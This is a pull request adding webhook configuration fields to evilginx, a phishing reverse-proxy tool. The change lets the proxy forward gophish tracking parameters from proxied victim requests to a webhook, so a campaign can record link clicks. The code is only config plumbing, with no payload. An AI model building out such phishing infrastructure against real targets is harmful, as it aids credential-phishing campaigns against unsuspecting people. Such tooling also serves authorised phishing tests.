### PR TITLE
Add webhook notifications

### DIFF
--- a/core/config.go
+++ b/core/config.go
@@ -1,5 +1,4 @@
 package core
-
 import (
 	"fmt"
 	"os"
@@ -42,6 +41,8 @@ type Config struct {
 	phishletNames     []string
 	activeHostnames   []string
 	redirectParam     string
+	webhookUrl        string
+	webhookParam      string
 	verificationParam string
 	verificationToken string
 	redirectUrl       string
@@ -68,6 +69,8 @@ const (
 	CFG_PROXY_PASSWORD     = "proxy_password"
 	CFG_PROXY_ENABLED      = "proxy_enabled"
 	CFG_BLACKLIST_MODE     = "blacklist_mode"
+	CFG_WEBHOOK_URL        = "webhook_url"
+	CFG_WEBHOOK_PARAM      = "webhook_param"
 )
 
 const DEFAULT_REDIRECT_URL = "https://www.youtube.com/watch?v=dQw4w9WgXcQ" // Rick'roll
@@ -121,6 +124,8 @@ func NewConfig(cfg_dir string, path string) (*Config, error) {
 	c.proxyPassword = c.cfg.GetString(CFG_PROXY_PASSWORD)
 	c.proxyEnabled = c.cfg.GetBool(CFG_PROXY_ENABLED)
 	c.blackListMode = c.cfg.GetString(CFG_BLACKLIST_MODE)
+	c.webhookUrl = c.cfg.GetString(CFG_WEBHOOK_URL)
+	c.webhookParam = c.cfg.GetString(CFG_WEBHOOK_PARAM)
 	s_enabled := c.cfg.GetStringSlice(CFG_SITES_ENABLED)
 	for _, site := range s_enabled {
 		c.sitesEnabled[site] = true
@@ -542,3 +547,4 @@ func (c *Config) GetTemplatesDir() string {
 func (c *Config) GetBlacklistMode() string {
 	return c.blackListMode
 }
+


### PR DESCRIPTION
This PR adds the ability to configure webhook notifications via the evilginx config file. 

By setting `webhook_url` and `webhook_param`, it is possible to extract params from proxied requests and forward them to the webhook URL. 

This was done to allow evilginx to inform gophish when links have been clicked by retrieving the `rid` tracking parameter used by gophish and forwarding it to the gophish url as defined in `webhook_param`. 
